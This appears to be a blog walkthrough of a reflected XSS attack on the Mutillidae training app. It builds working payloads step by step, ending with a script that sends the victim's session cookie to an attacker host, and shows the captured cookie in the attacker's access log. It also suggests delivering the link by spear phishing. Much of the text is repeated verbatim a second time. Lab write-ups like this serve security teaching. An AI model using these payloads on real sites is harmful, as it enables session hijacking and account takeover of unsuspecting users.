The webapp loads pages on the server side based on a param:
https://localhost/mutillidae/index.php?page=login.php
Replacing login.php with <script>alert('foo');</alert> doesn't yield anything interesting visually, but looking at the HTML of the response:
All we need to do it close the href tag and it'll work.
https://localhost/mutillidae/index.php?page="/><script>alert('foo');</script>
After the dialog is dismissed (multiple times, but that doesn't matter), we see that it's created a bit of a mess on the page, which could be a giveaway:
This can be tidied up by making that mess part of a nonsense tag, which the renderer will ignore:
https://localhost/mutillidae/index.php?page="/><script>alert('foo');</script><blah wibble="
That results in a clean page. Now the alert box can be replaced with a cookie-sender.
https://localhost/mutillidae/index.php?page="/><script>new Image().src = "http://localhost/?"%2BencodeURIComponent(document.cookie)</script><blah wibble="
On the attacker's box:
$ tail -f access.log
::1 - - [31/Aug/2016:07:23:42 -0400] "GET /?showhints%3D1%3B%20username%3Dadmin%3B%20uid%3D1%3B%20PHPSESSID%3Dq5p2do7c17d64sfj5bvuem2si1 HTTP/1.1" 302 -
The attacker would then hope to get a user to click on the link somehow, say via a spear phishing email.
Now the attacker can probably access the site that has the reflected XSS vulnerability as the exploited user.
Of course stealing a session cookie is only one application of an XSS. The "XSS Payloads" website has a library of scary payloads that can take screenshots, keylog, remote control the browser, attempt to turn on your webcam and more.
https://localhost/mutillidae/index.php?page=login.php
Replacing login.php with <script>alert('foo');</alert> doesn't yield anything interesting visually, but looking at the HTML of the response:
All we need to do it close the href tag and it'll work.
https://localhost/mutillidae/index.php?page="/><script>alert('foo');</script>
After the dialog is dismissed (multiple times, but that doesn't matter), we see that it's created a bit of a mess on the page, which could be a giveaway:
https://localhost/mutillidae/index.php?page="/><script>alert('foo');</script><blah wibble="
That results in a clean page. Now the alert box can be replaced with a cookie-sender.
https://localhost/mutillidae/index.php?page="/><script>new Image().src = "http://localhost/?"%2BencodeURIComponent(document.cookie)</script><blah wibble="
On the attacker's box:
$ tail -f access.log
::1 - - [31/Aug/2016:07:23:42 -0400] "GET /?showhints%3D1%3B%20username%3Dadmin%3B%20uid%3D1%3B%20PHPSESSID%3Dq5p2do7c17d64sfj5bvuem2si1 HTTP/1.1" 302 -
The attacker would then hope to get a user to click on the link somehow, say via a spear phishing email.
Now the attacker can probably access the site that has the reflected XSS vulnerability as the exploited user.
Of course stealing a session cookie is only one application of an XSS. The "XSS Payloads" website has a library of scary payloads that can take screenshots, keylog, remote control the browser, attempt to turn on your webcam and more.
No comments:
Post a Comment